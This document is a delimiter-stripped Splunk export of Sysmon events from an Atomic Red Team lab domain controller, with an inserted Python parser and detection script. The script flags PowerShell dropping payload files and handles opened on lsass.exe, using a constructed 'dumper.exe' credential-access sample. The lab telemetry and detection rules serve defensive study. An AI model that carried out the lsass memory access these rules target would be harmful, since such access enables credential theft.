21:08:53.560{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024510Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:53.560{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024509Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.560{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A2E5-60D3-1F06-00000000CF01}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024508Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.560{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2E5-60D3-1F06-00000000CF01}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024507Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.562{4DB9351A-A2E5-60D3-1F06-00000000CF01}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024506Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.404{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A45AC7B904CD4A1E6122242246D3FEDC,SHA256=13F50412007A3D6AF1B9CE50699ED796BBCB6C3333F802B484AD00589B559E76,IMPHASH=00000000000000000000000000000000falsetrue 
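The records above are Sysmon events as Splunk exported them: the XML element boundaries are gone, so each record is the System header (EventID, Version, Level, Task, Opcode, Keywords, EventRecordID, Channel, Computer) immediately followed by RuleName, UtcTime and the event-specific fields in Sysmon schema order. Two things make the blob recoverable: Task always equals EventID in Sysmon (which is why "11241100x8…" parses as 11/2/4/11/0 and not as a two-digit Task), and the Channel string only ever appears at a record boundary. The one field pair that is genuinely ambiguous is Event 10's SourceProcessId and SourceThreadId ("71602932"), which can only be split by learning the PID for that ProcessGuid from another event. The following is example code added by the editor, not part of the original export or of Sysmon/Splunk tooling; it assumes the Computer value `win-dc-663.attackrange.local` and the standard Sysmon field order for Events 1, 3, 10, 11 and 23. The sample records are copied from this page (the Event 10 call trace is shortened to three frames), except the last one, a constructed Event 10 against lsass.exe with a made-up source GUID and path, added only to show the memory-access detection firing:

```python
"""Rebuild Sysmon events from a delimiter-stripped Splunk export and run two
detections over them. Added example code; assumes the Sysmon schema field
order, not anything the export itself documents."""
from __future__ import annotations
import re
from typing import Optional

HOST = "win-dc-663.attackrange.local"          # Computer field of this export
UTC = r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3}"
GUID = r"\{[0-9A-Fa-f-]+\}"
PATH = r"[A-Za-z]:\\"

def header_re(host: str) -> re.Pattern:
    # System header; the (?P=eid) backreference enforces Task == EventID.
    return re.compile(
        r"(?P<eid>\d{1,2})(?P<ver>\d)(?P<lvl>\d)(?P=eid)(?P<op>\d)"
        r"(?P<kw>0x[0-9A-Fa-f]{16})(?P<rid>\d+)"
        r"Microsoft-Windows-Sysmon/Operational" + re.escape(host)
        + r"(?P<rule>.*?)(?P<utc>" + UTC + r")")

# Event 11 (FileCreate): ProcessGuid ProcessId Image TargetFilename CreationUtcTime
EV11 = re.compile(rf"^(?P<pguid>{GUID})(?P<pid>\d+)(?P<image>{PATH}.*?)"
                  rf"(?P<target>{PATH}.*?)(?P<ctime>{UTC})$")
# Event 10 (ProcessAccess): SourceGuid SourcePid+SourceTid SourceImage
#   TargetGuid TargetPid TargetImage GrantedAccess CallTrace
EV10 = re.compile(rf"^(?P<sguid>{GUID})(?P<spidtid>\d+)(?P<simage>{PATH}.*?)"
                  rf"(?P<tguid>{GUID})(?P<tpid>\d+)(?P<timage>{PATH}.*?)"
                  rf"(?P<access>0x[0-9A-Fa-f]+)(?P<trace>{PATH}.*)$")
# Events 1, 3, 11, 23 start "{ProcessGuid}<ProcessId><Image or User>", which
# gives an unambiguous GUID -> PID mapping.
GUID_PID = re.compile(rf"^(?P<guid>{GUID})(?P<pid>\d+)(?={PATH}|[A-Za-z][A-Za-z0-9 ]*\\)")

def split_records(blob: str, host: str) -> list[dict]:
    """Cut the export at each System header; keep header fields plus raw body."""
    matches = list(header_re(host).finditer(blob))
    out = []
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(blob)
        out.append({"EventID": int(m["eid"]), "RecordID": int(m["rid"]),
                    "RuleName": m["rule"], "UtcTime": m["utc"],
                    "body": blob[m.end():end].rstrip()})
    return out

def build_pid_map(records: list[dict]) -> dict[str, int]:
    pid_of: dict[str, int] = {}
    for r in records:
        m = GUID_PID.match(r["body"]) if r["EventID"] != 10 else None
        if m:
            pid_of[m["guid"]] = int(m["pid"])
    return pid_of

def split_pid_tid(joined: str, pid: Optional[int]) -> tuple[Optional[int], Optional[int]]:
    """'71602932' is only splittable once we know the PID is 7160."""
    if pid is not None and joined.startswith(str(pid)) and joined[len(str(pid)):].isdigit():
        return pid, int(joined[len(str(pid)):])
    return None, None

def parse_event(r: dict, pid_of: dict[str, int]) -> dict:
    ev = dict(r)
    body = ev.pop("body")
    if ev["EventID"] == 11 and (m := EV11.match(body)):
        ev.update(ProcessGuid=m["pguid"], ProcessId=int(m["pid"]), Image=m["image"],
                  TargetFilename=m["target"], CreationUtcTime=m["ctime"])
    elif ev["EventID"] == 10 and (m := EV10.match(body)):
        spid, stid = split_pid_tid(m["spidtid"], pid_of.get(m["sguid"]))
        ev.update(SourceProcessGuid=m["sguid"], SourceProcessId=spid, SourceThreadId=stid,
                  SourceImage=m["simage"], TargetProcessGuid=m["tguid"],
                  TargetProcessId=int(m["tpid"]), TargetImage=m["timage"],
                  GrantedAccess=int(m["access"], 16), CallTrace=m["trace"])
    return ev

def parse_export(blob: str, host: str) -> list[dict]:
    records = split_records(blob, host)
    pid_of = build_pid_map(records)
    return [parse_event(r, pid_of) for r in records]

# Detections. Access-mask constants are the documented Win32 values.
PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_ALL_ACCESS = 0x10, 0x20, 0x1FFFFF
PAYLOAD_EXT = (".exe", ".dll", ".ps1", ".bat", ".jse", ".vbs", ".xlsm")
SENSITIVE_TARGETS = {"lsass.exe"}

def powershell_payload_drops(events: list[dict]) -> list[str]:
    """Event 11: powershell.exe writing executable or script content to disk."""
    return [e["TargetFilename"] for e in events
            if e["EventID"] == 11 and "Image" in e
            and e["Image"].lower().endswith("\\powershell.exe")
            and e["TargetFilename"].lower().endswith(PAYLOAD_EXT)]

def sensitive_process_access(events: list[dict]) -> list[tuple[str, str, str]]:
    """Event 10: a handle to a sensitive process that allows memory access."""
    hits = []
    for e in events:
        if e["EventID"] != 10 or "TargetImage" not in e:
            continue
        target = e["TargetImage"].rsplit("\\", 1)[-1].lower()
        acc = e["GrantedAccess"]
        memory = bool(acc & (PROCESS_VM_READ | PROCESS_VM_WRITE)) or acc == PROCESS_ALL_ACCESS
        if target in SENSITIVE_TARGETS and memory:
            hits.append((e["SourceImage"], target, hex(acc)))
    return hits

# Sample input: four records copied from this export (call trace shortened in
# the third) plus one CONSTRUCTED Event 10 (record 99999, made-up GUID/path).
RECORDS = [
    r"11241100x800000000000000024486Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.216{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1547.001\src\jsestartup.jse2021-06-23 21:08:52.216",
    r"11241100x800000000000000024524Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:54.341{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1562.004\bin\AtomicTest.exe2021-06-23 21:08:54.341",
    r"10341000x800000000000000024521Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.810{4DB9351A-A2E5-60D3-1F06-00000000CF01}71602932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5",
    r'154100x800000000000000024507Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.562{4DB9351A-A2E5-60D3-1F06-00000000CF01}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service',
    r"10341000x800000000000000099999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:00.000{4DB9351A-B000-60D3-9999-00000000CF01}43215678C:\Users\Public\dumper.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Users\Public\dumper.exe+1234",
]
SAMPLE_BLOB = " ".join(RECORDS)   # records are space-separated in the export

if __name__ == "__main__":
    evs = parse_export(SAMPLE_BLOB, HOST)
    for e in evs:
        print(e["RecordID"], e["EventID"], e["RuleName"],
              e.get("TargetFilename") or e.get("TargetImage", ""))
    print("payload drops:", powershell_payload_drops(evs))
    print("sensitive access:", sensitive_process_access(evs))
```

Two caveats when running this over the full export. Lines wrapped on this page ("C:\Program " followed by "Files\…") rejoin cleanly by dropping the newline, because the wrap falls on an existing space. And the many 0x1fffff (PROCESS_ALL_ACCESS) Event 10 records from splunkd.exe, csrss.exe and conhost.exe against freshly started splunk-admon.exe, splunk-netmon.exe and splunk-powershell.exe are the handles a parent and the console subsystem receive at process creation; a ProcessAccess rule that keys on the access mask alone will page on every service start, which is why the example restricts it to the target image. The RuleName values "EXE" and "DLL" on some Event 11 records are the names given to matching rules in the Sysmon configuration, and the Event 1 record for splunk-powershell.exe carries "-" for every version-resource field, so version-string based allow-lists cannot vouch for that binary; its hashes can.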
11241100x800000000000000024536Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.841{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1566.001\bin\PhishingAttachment.xlsm2021-06-23 21:08:54.826 11241100x800000000000000024535Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.763{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1564\src\T1564-macrocode.txt2021-06-23 21:08:54.763 11241100x800000000000000024534Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.654{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1564.004\src\test.ps12021-06-23 21:08:54.654 10341000x800000000000000024533Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.482{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2E6-60D3-2006-00000000CF01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024532Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:54.482{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024531Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.482{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024530Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:54.482{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024529Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.482{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024528Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.482{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A2E6-60D3-2006-00000000CF01}3840C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024527Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.482{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2E6-60D3-2006-00000000CF01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024526Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.483{4DB9351A-A2E6-60D3-2006-00000000CF01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024525Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.420{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75BF6447C75DF238F79B66F9332FAA81,SHA256=39884AF61A0B82F88EB54DB0C1A9B940D0F52593F8C14B46715ACDB28BC41A4C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024524Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:54.341{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1562.004\bin\AtomicTest.exe2021-06-23 21:08:54.341 23542300x800000000000000024523Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.201{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DB7250A1E3E9C85997D87A2BC3E74A0F,SHA256=73DAB6746EC7ADE4816A25448EAA46F96E83592D15FD9E01CFF72EA66DF04C3B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024556Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:55.888{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\used_guids.txt2021-06-23 21:08:55.888 10341000x800000000000000024555Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.716{4DB9351A-A2E7-60D3-2106-00000000CF01}53006712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000024554Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:55.701{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1574.012\src\x64\Release\atomicNotepad.dll2021-06-23 21:08:55.701 11241100x800000000000000024553Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.545{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1574.012\src\atomicNotepad\atomicNotepad.vcxproj2021-06-23 21:08:55.545 10341000x800000000000000024552Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.545{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2E7-60D3-2106-00000000CF01}5300C:\Program 
